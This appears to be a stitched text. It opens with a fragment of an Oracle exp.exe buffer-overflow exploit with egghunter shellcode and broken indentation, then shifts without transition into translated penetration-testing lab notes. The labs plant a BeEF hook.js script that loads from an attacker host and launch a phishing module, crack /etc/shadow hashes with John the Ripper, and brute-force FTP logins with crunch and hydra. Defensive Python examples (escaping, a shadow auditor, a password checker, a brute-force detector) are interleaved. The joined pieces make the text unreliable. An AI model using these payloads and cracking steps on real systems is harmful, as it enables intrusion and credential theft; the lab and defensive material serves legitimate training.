# Date found approx: 9/3/2010
# Software Link: http://www.oracle.com/technology/products/database/oracle10g/index.html
# Version: 10.x and 11g r1 (r2 untested)
# Tested on: Windows XP SP3 En
# Usage:
# $ORACLE_HOME\exp.exe system parfile=overflow_oracle_exp.txt
def banner():
print "\n\t| ------------------------------------- |"
print "\t| Oracle exp.exe code execution explo!t |"
print "\t| by mr_me - net-ninja.net ------------ |\n"
header = ("\x69\x6E\x64\x65\x78\x65\x73\x3D\x6E\x0D\x0A\x6C\x6F\x67\x3D\x72\x65\x73\x75"
"\x6C\x74\x73\x2E\x74\x78\x74\x0D\x0A\x66\x69\x6C\x65\x3D");
# aligned to edx
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");
..... (omitted) .....
[Lab] Using Kali Linux 9
● BeEF XSS framework: obtaining user privileges
BeEF (Browser Exploitation Framework)
● It runs as JavaScript when the user's web browser loads a web page, and is a tool that supports everything from collecting information about the user's PC to wide-ranging attacks using Metasploit modules.
XSS (Cross-Site Scripting) vulnerability
● It means making the users who reach a script carry out a specific action, through the client-side scripts used on the web such as JavaScript, VBScript, CSS and Ajax.
● That "specific action" is usually the distribution of malicious code, worms or viruses. User information can also be collected.
Classification of XSS vulnerabilities (test every variable input of the web application)
● (First) Non-persistent (Reflected XSS): the user is lured through email, messenger or board link features, and the action fires when the user clicks. Because nothing is stored on the website, a user's click is needed to lure them.
● (Second) Persistent (Stored XSS): an attack technique that lures users by inserting a script into every field an attacker can write to, such as a board post's author, title and body. Because it usually remains on the website (stored in the database), many users can be lured easily.
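The hook.js line used later in this lab shows why output encoding matters: a stored <script> tag becomes live for every visitor of the page. The following is an added Python example, not part of these course notes or of BeEF, contrasting a page that concatenates a post body into HTML with one that escapes it, plus the response headers a server can send so that a script from another origin is refused even where escaping was missed. The template, function names and the sample payload are constructed for the example.

```python
import html

# Constructed sample payload in the shape the lab above uses: a stored
# <script> tag that loads a remote hook from another origin.
HOOK_PAYLOAD = '<script src="http://192.168.20.50:3000/hook.js"></script>'

# Constructed page template; {body} is where a board post's text is placed.
PAGE_TEMPLATE = '<html><body><h1>Board</h1><div class="post">{body}</div></body></html>'


def render_post_unsafe(body: str) -> str:
    """Vulnerable rendering: the post body is placed into the HTML unchanged,
    so a stored <script> tag becomes live markup for every visitor."""
    return PAGE_TEMPLATE.format(body=body)


def render_post_safe(body: str) -> str:
    """Hardened rendering: html.escape turns <, >, &, ' and " into entities,
    so the text is displayed but can never start a tag or an attribute."""
    return PAGE_TEMPLATE.format(body=html.escape(body, quote=True))


def contains_live_script(page: str) -> bool:
    """Demonstration check: does the rendered page still contain an
    unescaped <script opening tag?"""
    return "<script" in page.lower()


def security_headers() -> dict:
    """Defence in depth: a Content-Security-Policy restricted to the page's
    own origin makes the browser refuse a script loaded from another host
    (such as the :3000 hook above) even if escaping was missed somewhere."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    print(render_post_unsafe(HOOK_PAYLOAD))
    print(render_post_safe(HOOK_PAYLOAD))
```

Escaping at output time is the fix for both classes described above: for reflected XSS the escaped value is the request parameter, for stored XSS it is the database field, and in both cases the browser receives text rather than markup.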
Exploitation Tools
> BeEF XSS Framework
> beef
or
# beef-xss
# beef-xss
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
process already running.
Running the beef-xss command opens the web page automatically.
(http://127.0.0.1:3000/ui/authentication)
ID : beef
PASS: beef
① Create the page to be visited
# service apache2 restart
[ ok ] Restarting web server: apache2 ... waiting .
# cd /var/www
# rm -rf /var/www/*
# vi index.html
<HTML>
<BODY>
<CENTER><H1> It works! </H1></CENTER>
<script src="http://192.168.20.50:3000/hook.js"></script>
<P>This is the default web page for this server.</P>
<P>The Web Server software is running but no content has been added, yet.</P>
</BODY>
</HTML>
-> Insert the <script> .... </script> line.
-> hook.js runs when the client loads this page.
(Windows 7)
Use the Mozilla Firefox browser.
http://192.168.20.50
-> Check the page.
(Note) Verify with the Chrome or Firefox browser; Internet Explorer does not work well.
-> The client cannot tell that the hook.js file has been executed.
<F11><F12>
(Kali Linux)
Checking the Hooked Browsers menu on the left shows the user's IP information.
Select 192.168.20.202 under Hooked Browsers on the left.
In the Commands section on the right, select Module Tree,
select Social Engineering,
select Google Phishing,
and click the Execute button.
(Windows 7)
Check the changed web page.
[Lab] Using Kali Linux
Password cracking
- Offline password cracking = local password cracking (EX: John the Ripper)
- Online password cracking = remote password cracking (EX: hydra)
● Offline password cracking
● Let's use the John the Ripper tool
How to run John the Ripper
Password Attacks > Offline Attacks > john
or
# john
[Lab] Offline password crack (local password crack)
Systems used
- KaliLinux
- Metasploitable V2 Server
(Kali Linux)
# cat /etc/passwd | grep --color root
root:x:0:0:root:/root:/bin/bash
■ Interpreting the /etc/passwd file
root        user name
:x          placeholder
:0          UID (User ID)
:0          GID (Group ID)
:root       comment
:/root      home directory
:/bin/bash  login shell
# ls -l /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 2172 10월 2 19:21 /etc/passwd
-rw-r----- 1 root shadow 1448 10월 15 14:59 /etc/shadow
# cat /etc/shadow | grep --color root
root:$6$WEVVa8qf$Q9ERxWghMVy/KNq3xK9Ge7P.6dDpow0G8kT62W3DIcnCMC7ZOpX.i/SOuW0GHqPiN8YH1qfgOXoShMvsgORYb.:16258:0:99999:7:::
■ Interpreting the /etc/shadow file
root        user name
:$6$WEVVa8qf$Q9ERxWghMVy/KNq3xK9Ge7.....qfgOXoShMvsgORYb.
            password ($hash algorithm id$salt$hashed password)
:16258      password aging (last change): the day the password was changed (days since 1970-01-01)
:0          (min change): period during which the password cannot be changed (EX: 7)
:99999      (max change): maximum number of days the password may be used (EX: 30)
:7          (warn date): period during which the warning message is shown (EX: 7)
:           (inactive): inactivity period (EX: 7)
:           (expire date): last date the password may be used (EX: 2014.12.31)
:           (reserved):
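As an added example (not from these notes or from John the Ripper), the parser below reads lines in the /etc/shadow layout just described, turns the day counts into calendar dates, identifies the hash scheme from the $id$ prefix, and reports the findings an administrator would act on: empty password fields, weak hash schemes, and accounts still on the 99999-day default. The sample lines are constructed: the first two mirror the lab's root (Kali) and user1 (Metasploitable) entries, where user1's $1$ hash is MD5-crypt and root's $6$ is SHA-512-crypt; the daemon and guest lines are made up.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import List, Optional

EPOCH = date(1970, 1, 1)

# crypt(3) identifiers in the $id$ prefix; $1$ (MD5) is weak by today's standards.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}

# Constructed sample in the /etc/shadow layout described above. The first two
# lines mirror the lab's root and user1 entries; daemon and guest are made up
# to show a locked account and an empty password field.
SAMPLE_SHADOW = """\
root:$6$WEVVa8qf$Q9ERxWghMVy/KNq3xK9Ge7P.6dDpow0G8kT62W3DIcnCMC7ZOpX.i/SOuW0GHqPiN8YH1qfgOXoShMvsgORYb.:16258:0:99999:7:::
user1:$1$C/z.wtw5$9xIpcoOi03LF5IS.CrzYw/:16401:0:99999:7:::
daemon:*:16258:0:99999:7:::
guest::16258:0:99999:7:::
"""


@dataclass
class ShadowEntry:
    user: str
    hash_field: str
    last_change: Optional[int]   # days since 1970-01-01
    min_days: Optional[int]
    max_days: Optional[int]
    warn_days: Optional[int]
    inactive: Optional[int]
    expire: Optional[int]        # days since 1970-01-01

    @property
    def algorithm(self) -> str:
        """Name the hash scheme from the $id$ prefix, or classify the special
        values: '*', '!' or '!!' mean locked, an empty field means no password."""
        if self.hash_field in ("*", "!", "!!"):
            return "locked"
        if self.hash_field == "":
            return "empty"
        parts = self.hash_field.split("$")
        if len(parts) >= 4 and parts[0] == "":
            return CRYPT_IDS.get(parts[1], "unknown-$" + parts[1] + "$")
        return "legacy-des"

    @property
    def last_change_date(self) -> Optional[date]:
        """Convert the day count of the 'last change' field into a calendar date."""
        if self.last_change is None:
            return None
        return EPOCH + timedelta(days=self.last_change)


def _int_or_none(field: str) -> Optional[int]:
    return int(field) if field else None


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse shadow-format lines; every line must carry the nine ':' fields."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError("malformed shadow line: %r" % line)
        entries.append(ShadowEntry(fields[0], fields[1],
                                   *(_int_or_none(f) for f in fields[2:8])))
    return entries


def audit(entries: List[ShadowEntry]) -> dict:
    """Findings an administrator would act on: accounts with no password,
    hashes using a weak scheme, and passwords on the 99999-day default."""
    findings = {"empty_password": [], "weak_hash": [], "never_expires": []}
    for e in entries:
        if e.algorithm == "empty":
            findings["empty_password"].append(e.user)
        elif e.algorithm in ("md5crypt", "legacy-des"):
            findings["weak_hash"].append(e.user)
        if e.algorithm not in ("locked", "empty") and e.max_days == 99999:
            findings["never_expires"].append(e.user)
    return findings
```

Running audit(parse_shadow(SAMPLE_SHADOW)) flags user1 for its MD5-crypt hash and guest for its empty field, and lists root and user1 as never expiring; the 16258 in root's entry resolves to 2014-07-07.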
# ls -l /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 2213 7월 22 17:15 /etc/passwd
-rw-r----- 1 root shadow 1573 7월 22 17:15 /etc/shadow
# john
John the Ripper password cracker, ver: 1.7.9-jumbo-7_omp [linux-x86-sse2]
Copyright (c) 1996-2012 by Solar Designer and others
Homepage: http://www.openwall.com/john/
Usage: john [OPTIONS] [PASSWORD-FILES]
--config=FILE use FILE instead of john.conf or john.ini
--single[=SECTION] "single crack" mode
--wordlist[=FILE] --stdin wordlist mode, read words from FILE or stdin
--pipe like --stdin, but bulk reads, and allows rules
--loopback[=FILE] like --wordlist, but fetch words from a .pot file
--dupe-suppression suppress all dupes in wordlist (and force preload)
--encoding=NAME input data is non-ascii (eg. UTF-8, ISO-8859-1).
For a full list of NAME use --list=encodings
--rules[=SECTION] enable word mangling rules for wordlist modes
--incremental[=MODE] "incremental" mode [using section MODE]
--markov[=OPTIONS] "Markov" mode (see doc/MARKOV)
--external=MODE external mode or word filter
--stdout[=LENGTH] just output candidate passwords [cut at LENGTH]
--restore[=NAME] restore an interrupted session [called NAME]
--session=NAME give a new session the NAME
--status[=NAME] print status of a session [called NAME]
--make-charset=FILE make a charset file. It will be overwritten
--show[=LEFT] show cracked passwords [if =LEFT, then uncracked]
--test[=TIME] run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
--groups=[-]GID[,..] load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..] load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX] load salts with[out] COUNT [to MAX] hashes
--pot=NAME pot file to use
--format=NAME force hash type NAME: afs bf bfegg bsdi crc32 crypt
des django dmd5 dominosec dragonfly3-32 dragonfly3-64
dragonfly4-32 dragonfly4-64 drupal7 dummy dynamic_n
epi episerver gost hdaa hmac-md5 hmac-sha1
hmac-sha224 hmac-sha256 hmac-sha384 hmac-sha512
hmailserver ipb2 keepass keychain krb4 krb5 lm lotus5
md4-gen md5 md5ns mediawiki mscash mscash2 mschapv2
mskrb5 mssql mssql05 mysql mysql-sha1 nethalflm netlm
netlmv2 netntlm netntlmv2 nsldap nt nt2 odf office
oracle oracle11 osc pdf phpass phps pix-md5 pkzip po
pwsafe racf rar raw-md4 raw-md5 raw-md5u raw-sha
raw-sha1 raw-sha1-linkedin raw-sha1-ng raw-sha224
raw-sha256 raw-sha384 raw-sha512 salted-sha1 sapb
sapg sha1-gen sha256crypt sha512crypt sip ssh
sybasease trip vnc wbb3 wpapsk xsha xsha512 zip
--list=WHAT list capabilities, see --list=help or doc/OPTIONS
--save-memory=LEVEL enable memory saving, at LEVEL 1..3
--mem-file-size=SIZE size threshold for wordlist preload (default 5 MB)
--nolog disables creation and writing to john.log file
--crack-status emit a status line whenever a password is cracked
--max-run-time=N gracefully exit after this many seconds
--regen-lost-salts=N regenerate lost salts (see doc/OPTIONS)
--plugin=NAME[,..] load this (these) dynamic plugin(s)
[Reference] How to add a user
(CentOS) # useradd user01 ; passwd user01
(Debian) # useradd -m -s /bin/bash user01 ; passwd user01
-m : make directory
-s : shell
# useradd -m -s /bin/bash user01
# passwd user01
새 UNIX 암호 입력: (user01)
새 UNIX 암호 재입력: (user01)
passwd: 암호를 성공적으로 업데이트했습니다
# useradd -m -s /bin/bash hacker
# passwd hacker
새 UNIX 암호 입력: (h4ckEr1.)
새 UNIX 암호 재입력: (h4ckEr1.)
passwd: 암호를 성공적으로 업데이트했습니다
hacker -> h4ckEr1. (hacker1.)
A -> 4
O -> 0
l -> 1
# cd /root/bin
# unshadow /etc/passwd /etc/shadow > passwd.txt
# vi passwd.txt
root:$6$WEVVa8qf$Q9ERxWghMVy/KNq3xK9Ge7P.6dDpow0G8kT62W3DIcnCMC7ZOpX.i/SOuW0GHqPiN8YH1qfgOXoShMvsgORYb.:0:0:root:/root:/bin/bash
user01:$6$imj7YGai$xuWGmzdiO6wL3isEmuY4u8x0zMvmVykX0zevARtUPdlFiIu.wWg8kvvUiEvadJxkguQLCdYW1LBtz79nYMH0h.:1000:1001::/home/user01:/bin/sh
-> Delete the entries of every user except root and user01.
-> For the hacker user, create another separate file, test it and measure the time taken.
# john passwd.txt
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 2 password hashes with 2 different salts (sha512crypt [32/32])
toor (root)
user01 (user01)
guesses: 2 time: 0:00:00:00 DONE (Tue Jul 22 16:41:27 2014) c/s: 29.62 trying: user01 - toor
Use the "--show" option to display all of the cracked passwords reliably
■ How to use strong passwords
- Password length of 8 characters or more
- Letters (lowercase/uppercase)
- Digits
- Special characters (EX: $)
- Spaces
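An added Python example (not from these notes) that turns the rules above into a check. The thresholds are an assumption made for the example: a length of at least 8 and at least four of the five character classes listed. It also undoes the letter substitutions shown earlier (A -> 4, O -> 0, l -> 1), so that a password such as h4ckEr1. is rejected as derived from the user name even though it satisfies the character-class rules.

```python
import re
from typing import List

MIN_LENGTH = 8    # assumption for this example: the length rule from the notes above
MIN_CLASSES = 4   # assumption: at least four of the five listed character classes

# Substitutions listed in the notes above (A -> 4, O -> 0, l -> 1) plus a few
# equally common ones, mapped back so the base word can be recognised.
LEET_MAP = str.maketrans({"4": "a", "0": "o", "1": "l", "3": "e", "@": "a", "$": "s"})


def normalise(candidate: str) -> str:
    """Lower-case the candidate and undo leet substitutions: 'h4ckEr1.' -> 'hackerl.'."""
    return candidate.lower().translate(LEET_MAP)


def derived_from_username(password: str, username: str) -> bool:
    """True when the user name survives inside the normalised password."""
    u = username.lower()
    return len(u) >= 3 and u in normalise(password)


def check_password(password: str, username: str = "") -> List[str]:
    """Return the rules the password violates; an empty list means accepted."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("length<%d" % MIN_LENGTH)
    classes = {
        "lowercase": re.search(r"[a-z]", password) is not None,
        "uppercase": re.search(r"[A-Z]", password) is not None,
        "digit": re.search(r"[0-9]", password) is not None,
        "special": re.search(r"[^A-Za-z0-9 ]", password) is not None,
        "space": " " in password,
    }
    present = [name for name, hit in classes.items() if hit]
    if len(present) < MIN_CLASSES:
        problems.append("character-classes<%d (has: %s)" % (MIN_CLASSES, ",".join(present)))
    if username and derived_from_username(password, username):
        problems.append("derived-from-username")
    return problems
```

The point of the last rule is the one the john run above makes: toor and user01 fell in under a second because they are trivially related to the user name, and a mangling rule reaches h4ckEr1. just as quickly, so composition rules alone are not enough.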
[Lab] Cracking the hacker user's password
● Carry this out as an additional exercise.
[Assignment] A Windows version of the John the Ripper tool also exists.
● Try out the tool built for Windows.
# johnny
[Assignment] Test John the Ripper with a dictionary file (user/password).
[Assignment] Build an su-cracking tool that uses the su command.
● Search the Internet.
● (EX) the sucrack tool
● (EX) expect () && expect CMD + ssh CMD
[Lab] Using Kali Linux
● Online password cracking
● Let's use the xhydra (hydra-gtk) and hydra tools
How to run the xhydra program
Password Attacks > Online Attacks > hydra-gtk (hydra)
or
# hydra
[Lab] Online password crack (remote password crack)
Systems used
- KaliLinux (Attacker)
- Metasploitable V2 Server (Victim)
# nmap -sV -O -F 192.168.10.134 /* Metasploitable V2 Linux IP : 192.168.10.134 */
Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-22 17:25 KST
Nmap scan report for 192.168.10.134
Host is up (0.00053s latency).
Not shown: 82 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
513/tcp open login?
514/tcp open tcpwrapped
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
[Reference] hydra
# hydra -l msfadmin -P <password dictionary file> <target> <protocol>
or
# xhydra
# xhydra
-> Work with the generated dictionary file.
-> For creating the dictionary file and cracking, see the [Reference] section below.
[Reference] Create a dictionary file on the Kali Linux server and crack the user1 user's password over FTP.
(Metasploitable V2 Linux)
● On the server, create a user with an easy ID/password (EX: user1).
(RedHat family) # useradd user1 ; passwd user1
(Debian family) # useradd -m -s /bin/bash user1 ; passwd user1
$ sudo useradd -m -s /bin/bash user1 (/etc/sudoers)
$ sudo passwd user1
Enter new UNIX password: user1
Retype new UNIX password: user1
passwd: password updated successfully
-> Set user1's password to user1.
$ cat /etc/passwd | grep --color user1
user1:x:1003:1003::/home/user1:/bin/bash
$ sudo cat /etc/shadow | grep --color user1
user1:$1$C/z.wtw5$9xIpcoOi03LF5IS.CrzYw/:16401:0:99999:7:::
$ ftp localhost 21
Connected to localhost.
220 (vsFTPd 2.3.4)
Name (localhost:msfadmin): user1
331 Please specify the password.
Password: user1
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quit
221 Goodbye.
$
(Kali Linux)
● Create the dictionary file to use in the xhydra program.
# cd /root/bin
# crunch --help
crunch version 3.6
Crunch can create a wordlist based on criteria you specify. The outout from crunch
can be sent to the screen, file, or to another program.
Usage: crunch <min> <max> [options]
where min and max are numbers
Please refer to the man page for instructions and examples on how to use crunch.
# crunch 1 3
# crunch 1 3 klz
# crunch 1 3 klz > wordlist.txt
# crunch 1 5 user1 > user.list
Crunch will now generate the following amount of data: 22460 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 3905
# cat user.list
..... (omitted) .....
111re
111rr
111r1
1111u
1111s
1111e
1111r
11111
# grep --color user1 user.list
user1
# xhydra /* the tool run earlier */
Target tab:
Single Target : 192.168.10.134
Port : 21
Protocol : ftp
Output Options:
[ v ] Be Verbose
[ v ] Debug
Password tab:
Username
[ v ] Username : user1
Password
[ v ] Passwd list : /root/bin/user.list
Start tab:
Select "Start" at the bottom
(Reference) Check the command line shown at the very bottom of the xhydra tool
(Note) Edit the /root/bin/user.list file directly
# vi /root/bin/user.list
Enter "user1" at the top
After entering user1, delete everything after it (dG)
(Metasploitable V2)
$ sudo cat /var/log/vsftpd.log ($ sudo tail -f /var/log/vsftpd.log)
..... (omitted) .....
Wed Nov 26 20:10:39 2014 [pid 5981] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5991] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5985] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5983] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5993] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5996] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5998] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6000] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6002] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6004] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6006] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6008] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6010] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 6012] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:40 2014 [pid 5989] [user1] OK LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 5995] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 5997] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 5999] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6001] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6003] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6007] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6005] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6009] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 6011] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:42 2014 [pid 5987] [user1] FAIL LOGIN: Client "192.168.10.50"
$ sudo cat /var/log/auth.log
..... (omitted) .....
Nov 26 20:09:58 metasploitable vsftpd: pam_unix(ftp:auth): authentication failure; logname= uid=0 euid=0 tty=ftp ruser=user1 rhost=192.168.10.50 user=user1
Nov 26 20:10:29 metasploitable last message repeated 160 times
Nov 26 20:10:39 metasploitable last message repeated 57 times
Nov 26 20:10:56 metasploitable sshd[6014]: Accepted password for msfadmin from 192.168.10.50 port 54028 ssh2
Nov 26 20:10:56 metasploitable sshd[6016]: pam_unix(sshd:session): session opened for user msfadmin by (uid=0)
Nov 26 20:11:05 metasploitable sudo: msfadmin : TTY=pts/1 ; PWD=/home/msfadmin ; USER=root ; COMMAND=/bin/cat /var/log/vsftpd.log
Nov 26 20:11:05 metasploitable sudo: pam_unix(sudo:session): session opened for user root by msfadmin(uid=0)
Nov 26 20:11:05 metasploitable sudo: pam_unix(sudo:session): session closed for user root
Nov 26 20:13:14 metasploitable sudo: msfadmin : TTY=pts/1 ; PWD=/home/msfadmin ; USER=root ; COMMAND=/bin/cat /var/log/auth.log
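The vsftpd.log above records one CONNECT and one FAIL LOGIN per attempt, whereas auth.log collapses the PAM failures into "last message repeated N times", so vsftpd.log is the better source for counting attempts. The following added Python example (not from these notes or from vsftpd) parses lines in that format and raises an alert when one client accumulates a threshold of failed logins for one user inside a sliding window, and a second alert when a successful login follows such a burst. The log lines are constructed in the lab's format; the threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# vsftpd.log line shape shown above, e.g.
#   Wed Nov 26 20:10:39 2014 [pid 5981] [user1] FAIL LOGIN: Client "192.168.10.50"
#   Wed Nov 26 20:10:39 2014 [pid 5996] CONNECT: Client "192.168.10.50"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]+)\] )?(?P<event>CONNECT|OK LOGIN|FAIL LOGIN): Client "(?P<client>[^"]+)"$'
)

# Constructed sample modelled on the lab's log: a burst from one client
# against user1 that ends in a successful login, and one ordinary user who
# mistypes once. Addresses are the lab's private ranges.
SAMPLE_LOG = """\
Wed Nov 26 20:10:39 2014 [pid 5996] CONNECT: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5981] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5991] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5985] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5983] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:39 2014 [pid 5993] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:40 2014 [pid 5989] [user1] OK LOGIN: Client "192.168.10.50"
Wed Nov 26 20:10:41 2014 [pid 5995] [user1] FAIL LOGIN: Client "192.168.10.50"
Wed Nov 26 20:15:02 2014 [pid 6101] [msfadmin] FAIL LOGIN: Client "192.168.10.77"
Wed Nov 26 20:15:09 2014 [pid 6103] [msfadmin] OK LOGIN: Client "192.168.10.77"
"""

Record = Tuple[datetime, str, Optional[str], str]   # (time, client, user, event)


def parse_line(line: str) -> Optional[Record]:
    """Parse one vsftpd.log line; returns None for lines of any other shape."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("client"), m.group("user"), m.group("event")


def detect_bruteforce(text: str, threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> List[tuple]:
    """Alert once per (client, user) whose FAIL LOGIN count within the sliding
    window reaches `threshold`, and again if an OK LOGIN for that pair follows
    the burst (a likely successful guess)."""
    recent = defaultdict(deque)   # (client, user) -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, user, event = rec
        key = (client, user)
        if event == "FAIL LOGIN":
            q = recent[key]
            q.append(ts)
            while q and ts - q[0] > window:    # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("bruteforce", client, user, len(q), ts))
        elif event == "OK LOGIN" and key in flagged:
            alerts.append(("success-after-bruteforce", client, user, len(recent[key]), ts))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The sample yields two alerts for 192.168.10.50 against user1 and none for the single mistype from 192.168.10.77. A parallel tool such as the one shown above produces all of its failures within the same second, which is why the window check looks at counts rather than at spacing between attempts.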
[Assignment] Collect dictionary files.
● Collect dictionary files from the Internet.
[Example 1]
<dictionary file 1> : Oracle Database 10gR2
<dictionary file 2> : Oracle Database 11gR2
<dictionary file 3> : Oracle Database 12c
.....
# cat (dictionary file 1) (dictionary file 2) (dictionary file 3) > (new dictionary file)
EX) # cat file1 file2 file3 > file4
[Example 2]
<default password dictionary file>
<dictionary file obtained from the Internet>
# cat (default password dictionary file) (dictionary file obtained from the Internet) > (new dictionary file)
EX) # cat file1 file2 > file3
[Example 3]
<dictionary file obtained from the Internet 1>
<dictionary file obtained from the Internet 2>
# cat (dictionary file 1) (dictionary file 2) | sort -u > (new dictionary file)
EX) # cat file1 file2 | sort -u > file3
[Lab] Example of creating a dictionary file
Systems used
- KaliLinux
# mkdir -p /test && cd /test
# rm -rf /test/*
# echo 1111 > passwd1.txt
# echo 2222 > passwd2.txt
# echo 3333 > passwd3.txt
# cat passwd1.txt passwd2.txt passwd3.txt
# cat passwd1.txt passwd2.txt passwd3.txt > result.txt
# cat result.txt
# cat passwd3.txt passwd1.txt > result.txt
# cat result.txt
# vi passwd1.txt
1111
2222
3333
4444
# vi passwd2.txt
6666
3333
1111
7777
# vi passwd3.txt
3333
22
7777
1010
# cat passwd1.txt passwd2.txt passwd3.txt | sort -u > result.txt
# cat result.txt
Report submission stage
When writing the report
● The first page contains the overview and purpose of the project (EX: the definition of penetration testing, etc.).
● The schedule followed and the members must be stated precisely (EX: the assessors (consultants) who performed the project).
● State the targets and the location where the work was carried out (EX: service 00 and # others).
● State the methodology (EX: the overall methodology of the penetration test).
● Including the consulting firm's own methodology in the report makes it stand out more (EX: a differentiated report).
Presentation materials and the report
● Presentation materials and the report must be written separately.
[Lab] Look at the (sample) report and discuss how to build the presentation materials.
Interim/final report
Presentation materials
■ Project overview
■ Project purpose
■ Penetration test: February 2013, (Mon) ~ (Fri)
■ Staffing: 1 M/M
■ Penetration test schedule
  Feb 10 (Mon)  Environment analysis
  Feb 11 (Tue)  External penetration test
  Feb 12 (Wed)  External penetration test
  Feb 13 (Thu)  External penetration test
  Feb 14 (Fri)  Interim report
  Feb 17 (Mon)  Environment analysis
  Feb 18 (Tue)  Internal penetration test
  Feb 19 (Wed)  Internal penetration test
  Feb 20 (Thu)  Internal penetration test
  Feb 21 (Fri)  Final report
Staff / Scope / Contact
